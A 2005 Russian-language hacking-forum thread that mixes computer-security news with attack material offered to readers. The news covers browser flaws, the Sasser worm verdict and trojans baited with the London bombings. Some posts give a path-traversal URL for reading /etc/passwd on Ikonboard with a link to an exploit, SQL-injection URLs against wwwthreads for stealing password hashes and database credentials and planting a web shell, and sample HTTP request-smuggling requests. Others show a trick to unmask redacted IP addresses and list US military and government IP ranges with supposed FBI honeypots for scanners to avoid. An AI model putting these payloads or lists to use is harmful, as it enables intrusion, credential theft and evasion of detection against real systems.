Безопасность & Хакерство

Discussion in 'Мировые новости. Обсуждения.' started by k00p3r, 8 Jun 2005.

  1. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Здесь размещаем новости связанные с компьютерной безопасностью и хакерством.
    Все сообщения подобной тематики, вне этой темы будут удаляться.
     
    #1 k00p3r, 8 Jun 2005
    Last edited: 8 Jun 2005
  2. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Дыра в Mozilla/Firefox

    Согласно известной датской компании Secunia в браузерах Mozilla и Firefox обнаружена уязвимость в реализации фреймов,которая потенциально может использоваться с целью кражи конфиденциальной информации пользователя.
    Подробности: http://secunia.com/advisories/15601/
     
  3. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    разгул точно наводящихся вирусов

    Брюс Шнайер, основатель компании Counterpane Internet Security, известнейший специалист по криптографии, опубликовал на своём сайте эссе, посвящённое тенденциям в сфере сетевых рисков.
    Не давая никаких особых оценок, Шнайер просто перечисляет ожидаемые сценарии, и будущее выглядит весьма мрачно. По мнению Шнайера, в самом ближайшем времени следует ожидать комплексных червей, способных выполнять целый ряд функций, и в качестве примера предлагает вирус KEG.Spybot, который производит анализ общей уязвимости заражённой системы и отсылает отчёт своему автору через IRC-каналы.
    Шнайер предсказывает, что Microsoft Internet Information Services (IIS-сервер) будет ещё долго оставаться излюбленной мишенью для хакеров, хотя по мере того, как всё большее число компаний будут мигрировать на Windows 2003 и IIS 6, количество атак против IIS начнёт снижаться. Пиринговые сети, как полагает Шнайер, станут основным каналом первичного распространения вирусов.
    Кроме того, Шнайер ожидает скорого появления многочисленных вирусов "точного наведения". "Недавно мы обнаружили вирусы, которые используют сторонние средства сбора информации, в том числе Google, для углублённой разведки. Это приведёт к более эффективным методам распространения: вместо того чтобы распространяться хаотично, вирусы будут наводиться точно по конкретным целям, - прогнозирует Шнайер. - Благодаря тому, что такие мишени будут определяться с помощью сторонних служб, резко снизится количество "шума", который вирусы обычно производят при случайном выборе мишеней, следовательно срок между появлением и первым обнаружением червя резко увеличится".
    Вслед за рядом других специалистов Шнайер указывает, что взломы и DDoS-атаки превращаются в теневой бизнес. Хакеры торгуют информацией об обнаруженных уязвимостях, а те из них, в распоряжении которых имеются "зомби-сети", шантажируют коммерсантов, угрожая DDoS-атаками. Шнайер, впрочем, указывает, что большая часть "наездов" хакеры совершают на периферийных коммерсантов - онлайновые казино, игровые и порноресурсы. И чем чаще от хакеров откупаются, тем больше они наглеют.
    Впрочем, Шнайер прогнозирует, что в скором времени хакеры начнут атаковать и финансовые учреждения, поскольку онлайновые криминальные элементы ищут новые источники дохода. "Кроме того, ожидается всё больше "инсайдерских" атак с целью наживы. Уже сейчас большая часть целенаправленных атак производится из сетей самих атакованных организаций. Мы также ожидаем увеличения количества политически мотивированных хакерских атак..." - пишет Шнайер.

    Компьюлента
     
  4. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Покупая смартфон подумайте о безопасности

    Большинство владельцев смартфонов подозревает о скрытой угрозе вирусов, но не предпринимает никаких мер, чтобы обезопасить свои данные от вредоносных программ. Компания Symantec недавно провела небольшое опрос, среди 300 американских граждан. Из всех опрошенных, 73% сообщили, что знакомы с проблемой и понимают, как происходит распространение вирусов в мобильной среде.
    Кроме того, более чем 70% выразили озабоченность по этому поводу, т.к. опасаются за конфиденциальность своей информации. За прошлый год было написано множество вирусов, троянов, в том числе и нашумевший Cabir, как известно, атакующий смартфоны на Symbian OS.
    Несмотря на риск потери данных, около 55% ответили, что хранят на своих телефонах личные данные, 37% - деловую информацию и 28% - клиентские данные. Как известно, на смартфоны и коммуникаторы вирусы проникают через Интернет, и, зная это, 64% опрошенных ежедневно работают с электронной корреспонденцией, 56% - используют IM и 46% просто выходят в Интернет. Впрочем, волков бояться, - в лес не ходить...
    Интернет - не единственный способ "заразиться", например уже упомянутый Cabir распространяется через Bluetooth. Помимо защиты информации у пользователей появилась еще одна головная боль - "банкинг". 41% активно совершают финансовые расчеты через банковский онлайн сервис. По мнению 57%, пассивная безопасность существующих смартфонов куда ниже ПК, хотя это ошибочное мнение, уверяет Мэт Экрам (Matt Ekram), менеджер отдела безопасности Symantec.

    Crime-research
     
    1 person likes this.
  5. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    bug to [ IkonBoard v2.1.7b]

    Уязвимость найдена в скрипте topic.cgi в форуме Ikonboard v2.1.7b. Удалённый пользователь может выполнить следующий сценарий и получить например, /etc/passwd:

    http://127.0.0.1/topic.cgi?forum=[x]&topic= ../../../../../../../../etc/passwd%00


    Так же имеется simple-sploit для эксплуатации бага, который можно взять - http://clkiller.net/release/ikonb217b.rar

    Источник: www.ru24-team.net
     
  6. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    wwwthreads [all versions] - SQL-injection

    Уязвимость позволяет получить DES-хеш любого пользователя, создать веб-шелл, получить доступ к важной служебной информации. Использование:

    Получение хеша пароля:
    http://target/viewmessage.php?Cat=&...null,null,U_Password,null,null from w3t_Users where U_Username='admin'

    Получение учетных записей к БД:
    http://target/viewmessage.php?Cat=&... null,User,Password,null,null from mysql.user where User='root'

    Создание веб-шелла (при наличии прав на запись):
    http://target/viewmessage.php?Cat=&message=номер_сообщения_с_кодом_веб_шелла into outfile 'path_to_file/file.php'

    Источник: www.cyberlords.net
     
  7. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    В интернете появился список Ip-адресов секретных компьютеров США

    P-адреса ряда компьютеров, принадлежащих американским военным ведомствам, может без особого труда узнать любой желающий. Все, что для этого нужно сделать - загрузить из интернета небольшой файл в формате PDF размером в 300 кб.
    (http://news.findlaw.com/hdocs/docs/cyberlaw/usmck1102vaind.pdf)
    Как сообщает Lenta.ru, файл о котором идет речь, появился на веб-сайте публичной американской правовой базы FindLaw.com в связи с делом тридцатидевятилетнего хакера Гари Маккиннона. Безработный Маккиннон, известный под прозвищем Solo, был арестован несколько дней назад в Лондоне по подозрению в совершении взлома компьютерных сетей Министерства обороны США и NASA.

    В 2002 году подозреваемый, предположительно, проник в один из военных компьютеров на базе Форт-Майер в штате Виржиния, уничтожил порядка 1300 пользовательских аккаунтов и важную информацию. Восстановительные работы обошлись правительству почти в миллион долларов. Если вина Маккиннона будет доказана, ему может грозить крупный штраф и тюремное заключение на срок до 70 лет.

    Обвинительное заключение против Маккиннона на днях появилось на сайте FindLaw.com. Причем в файле, помимо описания противоправных действий хакера, приведен список IP-адресов компьютеров, которые Маккиннон незаконно взломал, а также список военных баз, к которым эти адреса относятся. Подобная информация, естественно, является закрытой, в связи с чем сами IP-адреса в документе закрашены черным цветом. Тем не менее, если выделить "секретную" таблицу, а затем скопировать ее и вставить, например, в текстовый редактор Microsoft Word, защищенные цифровые последовательности становятся видны.

    Понятно, что одно лишь знание IP-адресов не позволит получить беспрепятственный доступ к секретным компьютерам. Однако данная информация может облегчить для хакеров поиск потенциально слабых мест в защите сетей военных ведомств США. Кроме того, любой из этих адресов может быть подвергнут распределенной DoS-атаке.
     
  8. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    В PDF указанной выше все ip-адреса замазаны....но не отчаивайтесь....просто эти адреса неплохо укрыты от глаз простых смертных - я нашёл способ как их просмотреть.Просто копируете замазаные адреса и вставляете в блокнот, там появятся скрытые от глаз ип-адреса!=)
     
  9. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Чтобы не ходить вокург да около нате сразу вам списочек. Взято из ЖЖ xblp-а.

    ФБР под прицелом :))

    207.60.x.x and 207.61.x.x - FBI Linux servers used to trap scanners.

    Also:


    64.224.*
    64.225.*
    64.226.*
    195.10.*
    205.96.* - 205.103.*
    207.30.* - 207.120.*
    207.60.* - 207.61.*
    209.35.*
    216.25.* <-- (only to catch scanners)
    216.247.* <-- (only to catch scanners)
    62.0.0.1 - 62.30.255.255

    6.*.*.* - Army Information Systems Center
    21.*.*.* - US Defense Information Systems Agency
    22.*.*.* - Defense Information Systems Agency
    26.*.*.* - Defense Information Systems Agency
    29.*.*.* - Defense Information Systems Agency
    30.*.*.* - Defense Information Systems Agency
    49.*.*.* - Joint Tactical Command
    50.*.*.* - Joint Tactical Command
    55.*.*.* - Army National Guard Bureau
    64.224.*.*
    64.225.*.*
    64.226.*.*
    195.10.*
    205.96.* - 205.103.*
    207.30.* - 207.120.*
    207.60.* - 207.61.*
    209.35.*.*
    216.25.* <-- (only to catch scanners)
    216.247.* <-- (only to catch scanners)
    217.6.*.*
    155.7.0.0 American Forces Information (NET-AFISHQ-NET1)
    155.8.0.0 U.S. ArmyFort Gordon (NET-GORDON-NET5)
    155.9.0.0 United States Army Information Systems Command (NET-LWOOD-NET2)
    155.74.0.0 PEO STAMIS (NET-CEAP2)
    155.75.0.0 US Army Corps of Engineers (NET-CEAP3)
    155.76.0.0 PEO STAMIS (NET-CEAP4)
    155.77.0.0 PEO STAMIS (NET-CEAP5)
    155.78.0.0 PEO STAMIS (NET-CEAP6)
    155.79.0.0 US Army Corps of Engineers (NET-CEAP7)
    155.80.0.0 PEO STAMIS (NET-CEAP
    155.81.0.0 PEO STAMIS (NET-CEAP9)
    155.82.0.0 PEO STAMIS (NET-CEAP10)
    155.83.0.0 US Army Corps of Enginers (NET-CEAP11)
    155.84.0.0 PEO STAMIS (NET-CEAP12)
    155.85.0.0 PEO STAMIS (NET-CEAP13)
    155.86.0.0 US Army Corps of Engineers (NET-CEAP14)
    155.87.0.0 PEO STAMIS (NET-CEAP15)
    155.88.0.0 PEO STAMIS (NET-CEAP16)
    155.178.0.0 Federal Aviation Administration (NET-FAA)
    155.213.0.0 USAISC Fort Benning (NET-FTBENNNET3
    155.214.0.0 Director of Information Management (NET-CARSON-TCACC )
    155.215.0.0 USAISC-FT DRUM (NET-DRUM-TCACCIS)
    155.216.0.0 TCACCIS Project Management Office (NET-FTDIX-TCACCI)
    155.217.0.0 Directorate of Information Management (NET- EUSTIS-EMH1)
    155.218.0.0 USAISC (NET-WVA-EMH2)
    155.219.0.0 DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
    155.220.0.0 USAISC-DOIM (NET-FTKNOX-NET4)
    155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2)
    128.47.0.0 Army Communications Electronics Command (NET-TACTNET)
    128.50.0.0 Department of Defense (NET-COINS)
    128.51.0.0 Department of Defense (NET-COINSTNET)
    128.56.0.0 U.S. Naval Academy (NET-USNA-NET)
    128.63.0.0 Army Ballistics Research Laboratory (NET-BRL-SUBNET)
    128.80.0.0 Army Communications Electronics Command (CECOM) (NET-CECOMNET)
    128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency (NET-DERA-UK)
    128.154.0.0 NASA Wallops Flight Facility (NET-WFF-NET)
    128.155.0.0 NASA Langley Research Center (NET-LARC-NET)
    128.156.0.0 NASA Lewis Network Control Center (NET- LERC)
    128.157.0.0 NASA Johnson Space Center (NET-JSC-NET)
    128.158.0.0 NASA Ames Research Center (NET-MSFC-NET)
    128.159.0.0 NASA Ames Research Center (NET-KSC-NET)
    128.160.0.0 Naval Research Laboratory (NET- SSCNET)
    128.161.0.0 NASA Ames Research Center (NET-NSN-NET)
    128.183.0.0 NASA Goddard Space Flight Center (NET-GSFC)
    128.216.0.0 MacDill Air Force Base (NET-CC-PRNET)
    128.217.0.0 NASA Kennedy Space Center (NET-NASA-KSC-OIS)
    128.236.0.0 U.S. Air Force Academy (NET-USAFA-NET)

    207.60-61.*.* : FBI Linux servers used to trap scanners
    62.0-30.*.* :
    64.224.*.* :
    64.225.*.* :
    64.226.*.* :
    195.10.* :
    205.96-103.* :
    207.30-120.* :
    207.60-61.* :
    209.35.*.* :
    216.25.* : (only to catch scanners)
    216.247.* : (only to catch scanners)
    217.6.*.* :
    155.7.*.* : American Forces Information (NET-AFISHQ-NET1)
    155.8.*.* : U.S. ArmyFort Gordon (NET-GORDON-NET5)
    155.9.*.* : United States Army Information Systems Command (NET-LWOOD-NET2)
    155.74.*.* : PEO STAMIS (NET-CEAP2)
    155.75.*.* : US Army Corps of Engineers (NET-CEAP3)
    155.76.*.* : PEO STAMIS (NET-CEAP4)
    155.77.*.* : PEO STAMIS (NET-CEAP5)
    155.78.*.* : PEO STAMIS (NET-CEAP6)
    155.79.*.* : US Army Corps of Engineers (NET-CEAP7)
    155.80.*.* : PEO STAMIS (NET-CEAP
    155.81.*.* : PEO STAMIS (NET-CEAP9)
    155.82.*.* : PEO STAMIS (NET-CEAP10)
    155.83.*.* : US Army Corps of Enginers (NET-CEAP11)
    155.84.*.* : PEO STAMIS (NET-CEAP12)
    155.85.*.* : PEO STAMIS (NET-CEAP13)
    155.86.*.* : US Army Corps of Engineers (NET-CEAP14)
    155.87.*.* : PEO STAMIS (NET-CEAP15)
    155.88.*.* : PEO STAMIS (NET-CEAP16)
    155.178.*.* : Federal Aviation Administration (NET-FAA)
    155.213.*.* : USAISC Fort Benning (NET-FTBENNNET3
    155.214.*.* : Director of Information Management (NET-CARSON-TCACC )
    155.215.*.* : USAISC-FT DRUM (NET-DRUM-TCACCIS)
    155.216.*.* : TCACCIS Project Management Office (NET-FTDIX-TCACCI)
    155.217.*.* : Directorate of Information Management (NET- EUSTIS-EMH1)
    155.218.*.* : USAISC (NET-WVA-EMH2)
    155.219.*.* : DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
    155.220.*.* : USAISC-DOIM (NET-FTKNOX-NET4)
    155.221.*.* : USAISC-Ft Ord (NET-FTORD-NET2)
    128.47.*.* : Army Communications Electronics Command (NET-TACTNET)
    128.50.*.* : Department of Defense (NET-COINS)
    128.51.*.* : Department of Defense (NET-COINSTNET)
    128.56.*.* : U.S. Naval Academy (NET-USNA-NET)
    128.63.*.* : Army Ballistics Research Laboratory (NET-BRL-SUBNET)
    128.80.*.* : Army Communications Electronics Command (CECOM) (NET-CECOMNET)
    128.98.*.* : Defence Evaluation and Research Agency (NET-DERA-UK)
    128.154.*.* : NASA Wallops Flight Facility (NET-WFF-NET)
    128.155.*.* : NASA Langley Research Center (NET-LARC-NET)
    128.156.*.* : NASA Lewis Network Control Center (NET- LERC)
    128.157.*.* : NASA Johnson Space Center (NET-JSC-NET)
    128.158.*.* : NASA Ames Research Center (NET-MSFC-NET)
    128.159.*.* : NASA Ames Research Center (NET-KSC-NET)
    128.160.*.* : Naval Research Laboratory (NET- SSCNET)
    128.161.*.* : NASA Ames Research Center (NET-NSN-NET)
    128.183.*.* : NASA Goddard Space Flight Center (NET-GSFC)
    128.216.*.* : MacDill Air Force Base (NET-CC-PRNET)
    128.217.*.* : NASA Kennedy Space Center (NET-NASA-KSC-OIS)
    128.236.*.* : U.S. Air Force Academy (NET-USAFA-NET

    207.60-61.*.* : FBI Linux servers used to trap scanners
    6.*.*.* : Army Information Systems Center
    21.*.*.* : US Defense Information Systems Agency
    6.*.*.* : Army Information Systems Center
    21.*.*.* : US Defense Information Systems Agency
    22.*.*.* : Defense Information Systems Agency
    26.*.*.* : Defense Information Systems Agency
    29.*.*.* : Defense Information Systems Agency
    30.*.*.* : Defense Information Systems Agency
    49.*.*.* : Joint Tactical Command
    50.*.*.* : Joint Tactical Command
    55.*.*.* : Army National Guard Bureau
    22.*.*.* : Defense Information Systems Agency
    26.*.*.* : Defense Information Systems Agency
    29.*.*.* : Defense Information Systems Agency
    30.*.*.* : Defense Information Systems Agency
    49.*.*.* : Joint Tactical Command
    50.*.*.* : Joint Tactical Command
    55.*.*.* : Army National Guard Bureau
    62.0-30.*.* :
    64.224.*.* :
    64.225.*.* :
    64.226.*.* :
    195.10.* :
    205.96-103.* :
    207.30-120.* :
    207.60-61.* :
    209.35.*.* :
    216.25.* : (only to catch scanners)
    216.247.* : (only to catch scanners)
    217.6.*.* :
    207.60.2.128 - 207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC)
    64.224.* : (FBI's honeypot)
    64.225.* : (FBI's honeypot)
    64.226.* : (FBI's honeypot)
    195.10.* : (FBI's honeypot)
    205.96-103.* : (FBI's honeypot)
    207.30-120.* : (FBI's honeypot)
    207.60-61.* : (FBI's honeypot)
    209.35.* : (FBI's honeypot)
    216.25.* : (FBI's honeypot)
    216.247.* : (FBI's honeypot)
    212.159.40.211 : (FBI's honeypot)
    212.159.41.173 : (FBI's honeypot)
    212.159.0.2 : (FBI's honeypot)
    212.159.1.1 : (FBI's honeypot)
    212.159.1.4 : (FBI's honeypot)
    212.159.1.5 : (FBI's honeypot)
    212.56.107.22 : (FBI's honeypot)
    212.159.0.2 : (FBI's honeypot)
    212.159.33.56 : (FBI's honeypot)
    212.56.107.22 : (FBI's honeypot)
    139.142.*.* : 139.142.153.23
     
  10. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Новая техника Http атак

    Группа исследователей опубликовала документ описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.

    Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например:


    1 POST http://SITE/foobar.html HTTP/1.1
    2 Host: SITE
    3 Connection: Keep-Alive
    4 Content-Type: application/x-www-form-urlencoded
    5 Content-Length: 0
    6 Content-Length: 44
    7 [CRLF]
    8 GET /poison.html HTTP/1.1
    9 Host: SITE
    10 Bla: [space after the "Bla:", but no CRLF]
    11 GET http://SITE/page_to_poison.html HTTP/1.1
    12 Host: SITE
    13 Connection: Keep-Alive
    14 [CRLF]

    Пример 2:

    1 POST /some_script.jsp HTTP/1.0
    2 Connection: Keep-Alive
    3 Content-Type: application/x-www-form-urlencoded
    4 Content-Length: 9
    5 Content-Length: 204
    6
    7 this=thatPOST /vuln_page.jsp HTTP/1.0
    8 Content-Type: application/x-www-form-urlencoded
    9 Content-Length: 95
    10
    11 param1=value1&data=alert("stealing...


    Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.


    http://www.watchfire.com/resources/
     
  11. 777

    777 Elder - Старейшина

    Joined:
    7 May 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    0
    Во всех распространенных браузерах найдена уязвимость

    Проблема связана с тем, что браузер открывает диалоговые окна, не указывая источник их создания. Это позволяет сформировать вредоносную веб-страницу, которая после загрузки выведен на экран дополнительное диалоговое окно от имени какого-либо известного ресурса, например, онлайновой платежной системы или банка. Таким образом, нападающий может похитить пароль, номер счета и другую персональную информацию о жертве.
    Ситуация ухудшается тем, что брешь присутствует во всех распространенных браузерах последних версий, в том числе Internet Explorer 5.х/6.х, Firefox 1.х, Mozilla 1.7.х, Opera 8.х и Safari 1.х. Норвежская компания Opera уже устранила уязвимость, выпустив новую версию одноименного браузера с индексом 8.01. Загрузить установочный файл программы можно http://www.opera.com/download/ Пользователям других браузеров датская компания Secunia рекомендует не посещать неизвестные веб-сайты, ссылки на которые могут распространяться через интернет-пейджеры и посредством электронной почты. Заплаток для Internet Explorer, Firefox, Mozilla и Safari в настоящее время не существует.
     
  12. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    За вирусы не сажают

    В пятницу германский суд приговорил молодого человека, обвиняемого в создании прошлогоднего компьютерного червя Sasser, к одному году и девяти месяцам тюрьмы условно.

    Кроме того, в постановлении суда Вердена говорится, что 19-летний Свен Яшан должен в период трехлетнего испытательного срока отработать 30 часов на общественных работах в доме для престарелых или в больнице.

    Яшан признан виновным по четырем статьям за подмену данных и трем статьям за компьютерный саботаж. Это обвинение стало одним из нескольких успешных процессов над вирусмейкерами. Обычно правоохранительные органы плохо справляются с задачей выслеживания и поимки авторов злокачественного кода.

    В ходе данного процесса Яшан признал свою вину в манипуляциях с данными, компьютерном саботаже и создании помех работе компаний. Суд начался во вторник и закончился в пятницу. Он проходил за закрытыми дверьми, так как Яшан на момент совершения преступления был несовершеннолетним.

    Червь Sasser и шесть его известных вариантов начали распространяться в мае 2004 года и заразили сотни тысяч компьютеров с операционной системой Windows. Sasser использовал ошибку в Windows 2000 и Windows XP и приводил к сбою и перезагрузке ПК.

    Условный приговор был ожидаемым. Прокуроры требовали двухлетнего условного приговора с трехлетним испытательным сроком, а защита добивалась условного приговора в один год.

    Следствие доказало, что юноша тщательно спланирован запуск червя Sasser и выпускал его варианты, способные распространяться быстрее, добиваясь максимального ущерба. Ущерб был огромным, и в процессе следствия его удалось установить лишь частично.

    И все же действия Яшана были признаны типичными для такого рода трудных, замкнутых подростков и не имеющими своей целью коммерческое обогащение. Суд решил, что Яшан создал червя для того, чтобы завоевать признание со стороны своих сверстников.

    Яшан, проживающий в городке Ваффенсен (в Нижней Саксонии), был арестован в мае прошлого года после того, как Microsoft получила сведения от информатора, претендующего на награду в $250 тыс. Дело Sasser пока остается единственным успехом программы Microsoft Anti-Virus Reward, объявленной в ноябре 2003 года. Компания предлагает в общей сложности $1 млн информаторам, которые помогут властям задержать виновников четырех крупнейших эпидемий червей и вирусов, включая Sasser, и ассигновала на будущие награды еще $4 млн.

    Microsoft не раскрыла информаторов по делу Sasser, но в пятницу софтверный гигант сообщил, что призовые деньги будут выплачены двум людям, которые помогли установить автора червя. Они получат по $250 тыс. «Сотрудничество с правоохранительными органами и их поддержка в данном случае — важное и благородное дело, — говорится в заявлении главного юрисконсульта Microsoft Нэнси Андерсон. — Мы рады вручить денежный приз тем, кто предоставил достоверную информацию, которая помогла правоохранительным органам Германии».

    По правилам программы информаторами не могут быть участники преступления, а их информация должна привести к осуждению подозреваемого. Согласно веб-сайту Microsoft, награда в $250 тыс. все еще ждет тех, кто поможет арестовать и осудить виновных в выпуске на волю червя MyDoom.B, вируса Sobig и червя MSBlast.A, или Blaster.


    Источник:Zdnet
     
  13. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    В Microsoft переоценивают защищенность компьютеров

    Старший советник по безопасности Microsoft Детлеф Экерт (Detlef Eckert) заявил на конференции TechEd, организованной корпорацией в Амстердаме, что пользователи стали более осведомленными в вопросе защиты своих компьютеров.

    "Хотя интенсивность атак не спадает и сетевые черви все еще представляют опасность, общество пользователей в большинстве своем изменилось в лучшую сторону. Мы видим смену направления атак профессиональных преступников. Они стали более направленными и нацеленными на решение вопроса «как получить деньги?» Они занимаются фишерством для получения банковских реквизитов, шпионажем, использующим троянцев или ботнеты для атак «отказ в обслуживании», — сказал Экерт.

    Однако менеджер по продуктам ИТ-безопасности Microsoft Марио Хуарес (Mario Juarez) считает, что уровень пользования все еще недостаточно высок. В США только треть пользователей Windows XP установила Service Pack — последнее обновление с заплатками на множество уязвимостей.

    Недавно Microsoft завершила поглощение антивирусной компании Sybari и запустила сервис по удалению шпионских программ, на который подписались 20 млн. человек. Некоторые элементы сервиса предоставляются бесплатно, но, как сказал Экерт, антивирус будет продаваться. Microsoft готова бесплатно закрывать уязвимости в своей системе, но вирусы — это нечто не относящееся к ее ошибкам, сказал Экерт.

    Однако Грэм Клули (Graham Cluley), эксперт по антивирусам из компании ИТ-безопасности Sophos, не согласен с этим. На прошлой неделе он назвал Windows одной из величайших проблем в антивирусном мире. «Я уверен, что сейчас настоящая угроза кроется в компьютерах и серверах с Windows. В прошлом месяце мы увидели еще больше вредоносного ПО, и большая его часть нацелена на Windows. Существует один шанс из двух, что компьютер может заразиться всего спустя 12 минут после подключения к широкополосной сети», — сказал он.

    У Хуареса спросили, корректно ли продавать антивирус, который устраняет вирусы, использующие уязвимости Windows. Он ответил: «Это философский вопрос».

    Источник:Cnews
     
  14. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    Лондонская полиция ищет инвестиции для борьбы с хакерами

    Дополнительное финансирование со стороны частного капитала в размере 1 миллиона фунтов в год позволит вдвое увеличить число раскрываемых в Великобритании компьютерных преступлений. С таким заявлением выступила глава управления лондонской полиции по борьбе с компьютерными преступлениями (CCU) Чарли Макмерди (Charlie McMurdie), сообщает сайт viruslist.com.

    Макмерди обратилась к лондонским компаниям с просьбой дополнительно профинансировать свое управление и таким образом привлечь в его ряды 10 новых сотрудников. Преступления в сфере высоких технологий ежегодно обходятся Великобритании в 2,4 миллиарда фунтов. При этом 70 процентов всех преступлений, влияющих на британскую экономику, приходится на Лондон.

    Основной целью организованных преступных групп является Сити. По мнению Макмерди, до 80 процентов преступлений при этом совершаются с применением компьютерной техники. Глава CCU утверждает, что ее управление имеет всемирную известность и успешную историю борьбы с хакерами и онлайн-мошенниками. Однако усилий 10 сотрудников CCU для успешного выполнения всех задач в настоящее время уже не хватает. «Это небольшая команда, которая может видеть лишь верхушку айсберга в ходе расследований. Мы не идем в ногу с развитием компьютерных технологий. Нам нужно действовать вместе и двигаться значительно быстрей, чем мы это делаем сейчас или мы останемся позади», — отметила Макмерди. Глава CCU убеждена, что частные инвестиции позволят ее команде действовать активнее и проводить превентивную политику удачнее.

    Директор торговой ассоциации в области высоких технологий Intellect Ник Калисперас (Nick Kalisperas) полагает, что IT-индустрия должна положительно отреагиаровать на возможность сближения с полицией. «Дело не только в деньгах, но и в обмене знаниями и опытом», — полагает Калисперас. В свою очередь Макмерди полагает, что необходимые CCU инвестиции обязательно окупятся для структур, наиболее сильно страдающих от электронных преступлений.


    http://www.securitylab.ru/
     
  15. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    Серия новых троянов спекулирует на Лондонской трагедии

    Злоумышленники в интернете не преминули воспользоваться повышенным интересом мировой общественности к взрывам в Лондоне и устроили широкомасштабную рассылку троянских программ.

    В интернете обнаружена троянская программа, которая использует интерес людей к взрывам в Лондоне, унесшим жизни, по крайней мере, 49 человек.

    Пользователям рассылается электронное письмо со ссылкой на любительскую видеосъемку последствий взрыва бомбы в столичной подземке. При попытке открыть вложенный в письмо файл на компьютер устанавливается программа-троян.

    При запуске вложение копируется в файл /Windir/winlog.exe и изменяет раздел реестра HKLM/Software/microsoft/Windows/CurrentVersion/Run таким образом, чтобы оно автоматически выполнялось каждый раз во время загрузки Windows. Затем троян пользуется зараженным компьютером и серверами SMTP для рассылки огромного количества спама.

    Согласно информации английской компании MessageLabs, занимающейся проблемами сетевой безопасности, данное письмо — это фальшивый новостной html-бюллетень с темой «TERROR HITS LONDON» — «Террор обрушивается на Лондон».

    В электронном письме пользователям предлагается «просмотреть уникальные кадры из любительской видеосъемки». Файл называется «London Terror Moovie.avi» и выглядит как обычный видеоклип, однако на самом деле имеет расширение .exe, отделенное от ложного 124 пробелами. Кроме того, для маскировки также сообщается, что файл «проверен антивирусом Norton Antivirus.exe».

    Мошенники не удосужились даже вставить в графу «отправитель» реальный адрес CNN. Вместо этого они указали адрес [email protected], который принадлежит не CNN, а некоей компании во Флориде. Однако далеко не все пользователи об этом догадались, многие запустили файл.

    Это самый свежий случай нездорового социального инжиниринга, основанного на использовании вирусописателями трагических событий в своих целях. Мошенники часто упаковывают вирус в привлекательную для любопытствующих обложку в то время, когда происходят тревожные инциденты. Аналогичными попытками сопровождались война в Ираке, уничтожение небоскребов в Нью-Йорке 11 сентября и цунами в Азии.

    Источник:CNews.ru
     
  16. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    1,5 года за продажу и установку нелицензионного ПО

    Житель Томской области приговорен к 1,5 годам лишения свободы условно за компьютерное пиратство. Как сообщили РБК в Управлении информации и общественных связей Генеральной прокуратуры РФ, Александр Светличный был признан виновным в нарушении авторских прав и неправомерном доступе к компьютерной информации. Следствие установило, что Светличный в нарушение порядка, предусмотренного законом, приобрел, взломал и распространял за деньги путем копирования программный продукт, предназначенный для профессионального проектирования мебели. Стоимость лицензионного экземпляра этой программы превышает 50 тыс. руб. В ходе расследования уголовного дела установлен и подтвержден, в частности, факт модификации программы при помощи специфического электронного ключа, который позволил хакеру бесплатно пользоваться компьютерным средством проектирования, имеющим несколько степеней защиты. Светличный был признан виновным по ст.146 (нарушение авторских прав) и ст.272 (неправомерный доступ к компьютерной информации) Уголовного кодекса РФ. Ему назначено наказание в виде 1 года 6 месяцев лишения свободы условно с испытательным сроком 6 месяцев, отметили в прокуратуре.

    Источник:rbc.ru
     
  17. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    Google отобрал домены у российского киберсквотера

    Мошенник из Петербурга зарегистрировал целый ряд доменных имен, в которых слово «google» было написано с опечаткой. Невнимательные пользователи заходили на эти сайты и заражались вирусами.

